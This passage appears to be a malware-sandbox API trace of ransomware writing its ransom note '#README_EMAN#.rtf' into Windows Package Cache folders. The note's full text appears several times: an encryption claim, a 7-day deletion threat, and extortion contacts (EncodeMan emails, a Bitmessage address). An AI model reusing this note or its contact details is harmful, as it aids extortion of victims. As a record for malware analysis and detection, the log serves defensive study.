\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f3\x0e", lpUsedDefaultChar=0x0) returned 8717 [0260.935] WriteFile (in: hFile=0x28c, lpBuffer=0x1f4d618*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4d618*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0260.936] CloseHandle (hObject=0x28c) returned 1 [0260.936] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf")) returned 0x20 [0260.936] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#readme_eman#.rtf")) returned 0x20 [0260.936] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#readme_eman#.rtf")) returned 0x20 [0260.936] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0xffffffff [0260.936] GetLastError () returned 0x2 [0260.936] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0262.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0262.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, 